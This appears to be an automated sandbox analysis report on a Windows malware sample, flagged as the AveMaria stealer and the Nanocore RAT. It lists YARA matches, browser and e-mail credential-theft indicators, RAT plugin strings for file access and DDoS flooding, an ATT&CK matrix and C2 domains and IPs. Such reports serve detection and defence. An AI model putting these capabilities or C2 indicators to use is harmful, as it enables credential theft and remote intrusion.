      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

      Stealing of Sensitive Information:

      barindex
      Yara detected AveMaria stealerShow sources
      Source: Yara matchFile source: 22.2.images.exe.400000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.Xjf4yH9N2t.exe.400000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.Xjf4yH9N2t.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.images.exe.400000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000016.00000003.295384673.0000000000E24000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000003.248801127.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000003.248863856.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000003.295297154.0000000000E24000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000003.248772250.0000000000FD5000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000003.248878230.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000003.295398863.0000000000E28000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.5264629.19.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.5260000.20.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.5260000.20.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.3d08a28.9.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.3d08a28.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.3e8db04.11.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.3d0d051.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.3e7fc2f.13.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.3e88e65.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000028.00000002.476683090.0000000002CA1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000028.00000002.482137152.0000000005260000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000028.00000002.479953948.0000000003D00000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000028.00000002.472289227.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000028.00000002.480292301.0000000003E77000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: KetqqsbuJ.exe PID: 5916, type: MEMORYSTR
      Contains functionality to steal Chrome passwords or cookiesShow sources
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: \Google\Chrome\User Data\Default\Login Data
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: \Chromium\User Data\Default\Login Data
      Contains functionality to steal e-mail passwordsShow sources
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: POP3 Password
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: SMTP Password
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: IMAP Password
      Tries to harvest and steal browser information (history, passwords, etc)Show sources
      Source: C:\ProgramData\images.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
      Source: Yara matchFile source: 22.2.images.exe.400000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.Xjf4yH9N2t.exe.400000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.Xjf4yH9N2t.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.images.exe.400000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000016.00000003.295384673.0000000000E24000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000003.248801127.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000003.248863856.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000003.295297154.0000000000E24000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000003.248772250.0000000000FD5000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000003.248878230.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000003.295398863.0000000000E28000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: images.exe PID: 2044, type: MEMORYSTR

      Remote Access Functionality:

      barindex
      Detected Nanocore RatShow sources
      Source: KetqqsbuJ.exeString found in binary or memory: NanoCore.ClientPluginHost
      Source: KetqqsbuJ.exe, 00000028.00000002.483125552.0000000006C10000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
      Source: KetqqsbuJ.exe, 00000028.00000002.483194992.0000000006C40000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
      Source: KetqqsbuJ.exe, 00000028.00000002.476683090.0000000002CA1000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: KetqqsbuJ.exe, 00000028.00000002.483052985.0000000006AB0000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
      Source: KetqqsbuJ.exe, 00000028.00000002.477157085.0000000002D0B000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
      Yara detected AveMaria stealerShow sources
      Source: Yara matchFile source: 22.2.images.exe.400000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.Xjf4yH9N2t.exe.400000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.Xjf4yH9N2t.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.images.exe.400000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000016.00000003.295384673.0000000000E24000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000003.248801127.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000003.248863856.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000003.295297154.0000000000E24000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000003.248772250.0000000000FD5000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000003.248878230.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000003.295398863.0000000000E28000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.5264629.19.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.5260000.20.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.5260000.20.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.3d08a28.9.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.3d08a28.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.3e8db04.11.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.3d0d051.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.3e7fc2f.13.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 40.2.KetqqsbuJ.exe.3e88e65.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000028.00000002.476683090.0000000002CA1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000028.00000002.482137152.0000000005260000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000028.00000002.479953948.0000000003D00000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000028.00000002.472289227.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000028.00000002.480292301.0000000003E77000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: KetqqsbuJ.exe PID: 5916, type: MEMORYSTR

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation1LSASS Driver1LSASS Driver1Disable or Modify Tools1OS Credential Dumping3System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer32Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationEndpoint Denial of Service1
      Default AccountsNative API1Create Account11Access Token Manipulation1Deobfuscate/Decode Files or Information1Input Capture121System Service Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsService Execution2Windows Service21Windows Service21Obfuscated Files or Information4Credentials In Files1File and Directory Discovery4SMB/Windows Admin SharesInput Capture121Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Registry Run Keys / Startup Folder1Process Injection422Software Packing13NTDSSystem Information Discovery24Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptRegistry Run Keys / Startup Folder1Masquerading3LSA SecretsSecurity Software Discovery121SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonModify Registry1Cached Domain CredentialsVirtualization/Sandbox Evasion21VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol122Jamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion21DCSyncProcess Discovery3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection422/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronHidden Users2Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 457791 Sample: Xjf4yH9N2t.exe Startdate: 02/08/2021 Architecture: WINDOWS Score: 100 76 hhjhtggfr.duckdns.org 2->76 84 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->84 86 Multi AV Scanner detection for domain / URL 2->86 88 Malicious sample detected (through community Yara rule) 2->88 90 11 other signatures 2->90 11 Xjf4yH9N2t.exe 3 2->11         started        15 dhcpmon.exe 3 2->15         started        17 tsusbhub.sys 3 2->17         started        19 2 other processes 2->19 signatures3 process4 file5 70 C:\Users\user\AppData\...\Xjf4yH9N2t.exe.log, ASCII 11->70 dropped 108 Contains functionality to inject threads in other processes 11->108 110 Contains functionality to steal Chrome passwords or cookies 11->110 112 Contains functionality to steal e-mail passwords 11->112 21 Xjf4yH9N2t.exe 4 5 11->21         started        25 Xjf4yH9N2t.exe 11->25         started        27 Xjf4yH9N2t.exe 11->27         started        signatures6 process7 file8 66 C:\ProgramData\images.exe, PE32 21->66 dropped 68 C:\ProgramData\images.exe:Zone.Identifier, ASCII 21->68 dropped 104 Increases the number of concurrent connection per server for Internet Explorer 21->104 106 Hides that the sample has been downloaded from the Internet (zone.identifier) 21->106 29 images.exe 3 21->29         started        32 cmd.exe 1 21->32         started        signatures9 process10 signatures11 118 Multi AV Scanner detection for dropped file 29->118 120 Detected unpacking (creates a PE file in dynamic memory) 29->120 122 Machine Learning detection for dropped file 29->122 34 images.exe 5 25 29->34         started        39 reg.exe 1 1 32->39         started        41 conhost.exe 32->41         started        process12 dnsIp13 78 hutyrtit.ydns.eu 203.159.80.165, 49730, 80 LOVESERVERSGB Netherlands 34->78 80 hhjhtggfr.duckdns.org 203.159.80.186, 49727, 49738, 49739 